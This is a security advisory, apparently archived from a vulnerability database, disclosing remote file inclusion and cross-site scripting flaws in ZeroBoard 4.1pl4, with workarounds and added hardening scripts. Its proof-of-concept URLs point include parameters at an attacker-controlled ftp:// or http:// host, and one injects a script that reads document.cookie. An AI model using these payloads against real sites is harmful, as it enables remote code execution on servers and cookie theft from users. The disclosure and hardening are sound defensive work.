STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard

2004-12-25T00:00:00
ID SECURITYVULNS:DOC:7447
Type securityvulns
Reporter Securityvulns
Modified 2004-12-25T00:00:00

Description


Revision: 1.2
Date Published: 2004-12-20 (KST)
Last Update: 2004-12-24
Disclosed by: SSR Team (advisory@stgsecurity.com)

Summary

ZeroBoard is one of the most widely used web BBS applications in Korea. However, input validation flaws allow malicious attackers to run arbitrary commands with the privileges of the HTTPD process, which typically runs as the nobody user.

Vulnerability Class

Implementation Error: Input validation flaw

Impact

High: arbitrary command execution.

Affected Products

ZeroBoard 4.1pl4 and prior

Vendor Status: NOT FIXED

2004-11-20 Vulnerabilities found.
2004-11-20 1st vendor contact; no reply.
2004-11-22 2nd vendor contact; no reply.
2004-12-13 STG Security, Inc. customers notified.
2004-12-24 Official release.

Details

Vulnerability 1 : PHP source injection vulnerability


  • Proof of concept: http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/
  • Environment: PHP 5.0.x, php.ini: register_globals = On
  • Description: As of PHP 5.0.0, file_exists() accepts URL wrappers (see http://www.php.net/manual/en/function.file-exists.php), so the existence check no longer guarantees a local directory, and the _zb_path parameter of outlogin.php can be easily exploited.
  • Part of the vulnerable source, outlogin.php:

      // check that this is a ZeroBoard directory
      if(!file_exists($_zb_path."lib.php")) {
          echo "제로보드 디렉토리가 아닙니다";
          return;
      }

      // read _head.php
      @include $_zb_path."_head.php";

  }


Vulnerability 2 : PHP source injection vulnerability


  • Proof of concept: http://[victim]/include/write.php?dir=http://[attacker]/
  • Environment: php.ini: register_globals = On
  • Reason: Uninitialized $dir variable in write.php
  • Part of the vulnerable source, include/write.php:

      include $dir."/write.php";
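Both source injection issues depend on the interpreter settings named in the Environment lines above. The following script is an added example, not part of the advisory or of ZeroBoard, that reports those settings so an administrator can confirm the hardened values (register_globals = Off, allow_url_fopen = Off and, on PHP 5.2.0 or later, allow_url_include = Off) before or after applying the workarounds. The function names zb_ini_on and zb_risky_ini_settings are assumptions.

```php
<?php
// Added example, not ZeroBoard's own code: report the php.ini settings that
// make the two source-injection issues exploitable. Function names are assumptions.

// ini_get() returns the raw configured value; normalise the spellings PHP accepts.
function zb_ini_on($name)
{
    $value = strtolower(trim((string) ini_get($name)));
    return in_array($value, array('1', 'on', 'yes', 'true'), true);
}

/**
 * Return an array of setting => explanation for every risky value found.
 * An empty array means the interpreter is configured as recommended.
 */
function zb_risky_ini_settings()
{
    $problems = array();

    // register_globals = On turns ?_zb_path=... and ?dir=... into PHP variables.
    // (Removed in PHP 5.4, where ini_get() returns false and this check passes.)
    if (zb_ini_on('register_globals')) {
        $problems['register_globals'] = 'On: request parameters become global variables';
    }
    // allow_url_fopen = On lets file_exists() and, before PHP 5.2, include
    // open ftp:// and http:// targets.
    if (zb_ini_on('allow_url_fopen')) {
        $problems['allow_url_fopen'] = 'On: ftp:// and http:// accepted by file functions';
    }
    // allow_url_include (PHP 5.2.0 and later) governs include/require of URLs separately.
    if (zb_ini_on('allow_url_include')) {
        $problems['allow_url_include'] = 'On: include/require accept URLs';
    }
    return $problems;
}

$found = zb_risky_ini_settings();
if (!$found) {
    echo "php.ini: no risky settings found\n";
} else {
    foreach ($found as $name => $why) {
        echo "php.ini: $name $why\n";
    }
}
```

Run it with the same php binary and php.ini that the web server uses (a CLI build often reads a different ini file), otherwise the report describes the wrong interpreter.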

Vulnerability 3 : Cross-site scripting vulnerability


  • Proof of concept: http://[victim]/check_user_id.php?user_id=<script>alert(document.cookie)</script>
  • Reason: check_user_id.php doesn't validate the input value of user_id.
  • Part of the vulnerable source, check_user_id.php:

      $user_id = trim($user_id);
      ... omitted ...
      if($check[0]) echo "$user_id 는 이미 등록된<br> 아이디입니다";
      else echo "$user_id 는 사용하실수 있습니다";
      ... omitted ...

Workaround

Until official patches for these vulnerabilities are available, modify the vulnerable sources as recommended below.

Vulnerability 1: As of zboard 4.1pl4

Insert the following code at line 59 of outlogin.php:

if(eregi(":\/\/",$_zb_path)) $_zb_path="";

Vulnerability 2: As of zboard 4.1pl4

Insert the following code at line 15 of include/write.php:

if(eregi(":\/\/",$dir)) $dir="";

Vulnerability 3: As of zboard 4.1pl4

Insert the following code at line 3 of check_user_id.php:

$user_id = htmlspecialchars(trim($user_id));
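The three one-line workarounds above stop the published proofs of concept: the eregi() lines refuse any value containing "://", and htmlspecialchars() encodes the ID before it is echoed. As an added example, not ZeroBoard's code and not part of the advisory, the script below shows a stricter form of the same three fixes: the include paths are resolved with realpath() and must lie inside the installation directory (which also refuses wrappers without "://" and "../" escapes), and the user ID is validated against a format on input as well as encoded on output. The function names (zb_local_path, zb_html, zb_valid_user_id, zb_user_id_message), the assumed skin/ location and the assumed user-ID format are not from the advisory. One caveat for anyone applying the original workaround on a newer interpreter: eregi() was deprecated in PHP 5.3 and removed in PHP 7.0, so preg_match() is used here instead.

```php
<?php
// Added example, not ZeroBoard's own code: hardened versions of the three
// spots named in the advisory. The function names (zb_local_path, zb_html,
// zb_valid_user_id, zb_user_id_message), the skin/ location and the user-ID
// format are assumptions.

/**
 * Return $candidate resolved to a real local directory (with a trailing
 * separator) only if it is $root itself or lies below it; otherwise false.
 * Compared with the advisory's "://" check this also refuses other stream
 * wrappers (php://, data:) and "../" escapes out of $root.
 */
function zb_local_path($candidate, $root)
{
    // Empty value, or a NUL byte that would truncate the path in the C file functions.
    if ($candidate === '' || strpos($candidate, "\0") !== false) {
        return false;
    }
    // Any scheme prefix is refused. Side effect: "C:\" style paths are refused
    // too, which is acceptable because callers pass paths relative to the install.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        return false;
    }
    $realRoot = realpath($root);
    $real     = realpath($candidate);
    if ($realRoot === false || $real === false || !is_dir($real)) {
        return false;   // nonexistent, or not a directory
    }
    $realRoot = rtrim($realRoot, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $real     = rtrim($real, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // Containment: the resolved directory must start with the resolved root.
    if (strncmp($real, $realRoot, strlen($realRoot)) !== 0) {
        return false;
    }
    return $real;
}

// Assumed ID policy: 3 to 20 characters, ASCII letters, digits and underscore.
function zb_valid_user_id($id)
{
    return preg_match('/^[A-Za-z0-9_]{3,20}\z/', $id) === 1;
}

// HTML-encode before echoing into the page. ENT_QUOTES also encodes single
// quotes, so the value is safe inside attribute values as well as element text.
// Pass the page's character set as the third argument if it is not PHP's default.
function zb_html($text)
{
    return htmlspecialchars($text, ENT_QUOTES);
}

// Replacement for the echo in check_user_id.php: validate on input, encode on output.
// $taken stands for the database result the original keeps in $check[0].
function zb_user_id_message($user_id, $taken)
{
    $user_id = trim($user_id);
    if (!zb_valid_user_id($user_id)) {
        return 'Invalid user ID format';
    }
    $safe = zb_html($user_id);
    return $taken ? "$safe is already registered" : "$safe is available";
}

// How the path check replaces the advisory's eregi() lines:
//
// outlogin.php (Vulnerability 1); dirname(__FILE__) is the ZeroBoard install directory:
//   $_zb_path = zb_local_path(isset($_zb_path) ? $_zb_path : './', dirname(__FILE__));
//   if ($_zb_path === false || !file_exists($_zb_path . 'lib.php')) { echo "..."; return; }
//   @include $_zb_path . '_head.php';
//
// include/write.php (Vulnerability 2); skins assumed to live in skin/ beside include/:
//   $dir = zb_local_path(isset($dir) ? $dir : '', dirname(__FILE__) . '/../skin');
//   if ($dir === false) { echo "..."; return; }
//   include $dir . 'write.php';

// Self-check with constructed inputs; run from the command line.
chdir(dirname(__FILE__));
$root = dirname(__FILE__);
echo "own directory accepted: "; var_dump(zb_local_path('./', $root) !== false);
echo "ftp wrapper rejected:   "; var_dump(zb_local_path('ftp://host.invalid/pub/', $root) === false);
echo "parent escape rejected: "; var_dump(zb_local_path('../', $root) === false);
echo "bad id rejected:        "; var_dump(zb_user_id_message('bad<id>', false));
echo "good id encoded:        "; var_dump(zb_user_id_message('jeremy_b', true));
```

The containment check is deliberately done on the realpath() result rather than on the raw string, so symlinks and "./" or "../" segments are resolved before the comparison; note that realpath() also returns false for a directory that does not exist, which is why the file_exists() check in outlogin.php is kept as well.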

Credits

Jeremy Bae at STG Security